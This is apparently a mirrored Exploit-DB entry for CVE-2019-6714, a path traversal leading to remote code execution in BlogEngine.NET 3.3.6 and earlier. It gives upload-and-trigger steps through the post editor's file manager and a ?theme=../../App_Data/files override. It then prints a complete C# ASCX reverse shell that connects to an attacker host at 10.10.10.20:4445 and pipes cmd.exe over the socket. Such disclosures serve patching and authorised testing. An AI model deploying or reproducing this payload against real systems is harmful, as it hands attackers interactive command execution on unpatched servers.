BlogEngine.NET 3.3.6 – Directory Traversal / Remote Code Execution

  • 作者: Dustin Cobb
    日期: 2019-02-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46353/
  • # Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE
    # Date: 02-11-2019
    # Exploit Author: Dustin Cobb
    # Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/
    # Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip
    # Version: <= 3.3.6
    # Tested on: Windows 2016 Standard / IIS 10.0
    # CVE : CVE-2019-6714
    
    /*
     * CVE-2019-6714
     *
     * Path traversal vulnerability leading to remote code execution. This 
     * vulnerability affects BlogEngine.NET versions 3.3.6 and below. This 
     * is caused by an unchecked "theme" parameter that is used to override
     * the default theme for rendering blog pages. The vulnerable code can 
     * be seen in this file:
     * 
     * /Custom/Controls/PostList.ascx.cs
     *
     * Attack:
     *
     * First, we set the TcpClient address and port within the method below to 
     * our attack host, who has a reverse tcp listener waiting for a connection.
     * Next, we upload this file through the file manager. In the current (3.3.6)
     * version of BlogEngine, this is done by editing a post and clicking on the 
     * icon that looks like an open file in the toolbar. Note that this file must
     * be uploaded as PostView.ascx. Once uploaded, the file will be in the
     * /App_Data/files directory off of the document root. The admin page that
     * allows upload is:
     *
     * http://10.10.10.10/admin/app/editor/editpost.cshtml
     *
     *
     * Finally, the vulnerability is triggered by accessing the base URL for the 
     * blog with a theme override specified like so:
     *
     * http://10.10.10.10/?theme=../../App_Data/files
     *
     */
    
    <%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
    <%@ Import Namespace="BlogEngine.Core" %>
    
    <script runat="server">
    	static System.IO.StreamWriter streamWriter;
    
    protected override void OnLoad(EventArgs e) {
    base.OnLoad(e);
    
    	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
    		using(System.IO.Stream stream = client.GetStream()) {
    			using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
    				streamWriter = new System.IO.StreamWriter(stream);
    						
    				StringBuilder strInput = new StringBuilder();
    
    				System.Diagnostics.Process p = new System.Diagnostics.Process();
    				p.StartInfo.FileName = "cmd.exe";
    				p.StartInfo.CreateNoWindow = true;
    				p.StartInfo.UseShellExecute = false;
    				p.StartInfo.RedirectStandardOutput = true;
    				p.StartInfo.RedirectStandardInput = true;
    				p.StartInfo.RedirectStandardError = true;
    				p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
    				p.Start();
    				p.BeginOutputReadLine();
    
    				while(true) {
    					strInput.Append(rdr.ReadLine());
    					p.StandardInput.WriteLine(strInput);
    					strInput.Remove(0, strInput.Length);
    				}
    			}
    		}
    	}
    }
    
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
     	StringBuilder strOutput = new StringBuilder();
    
     	if (!String.IsNullOrEmpty(outLine.Data)) {
     		try {
    	strOutput.Append(outLine.Data);
    	streamWriter.WriteLine(strOutput);
    	streamWriter.Flush();
    } catch (Exception err) { }
    }
    }
    
    </script>
    <asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>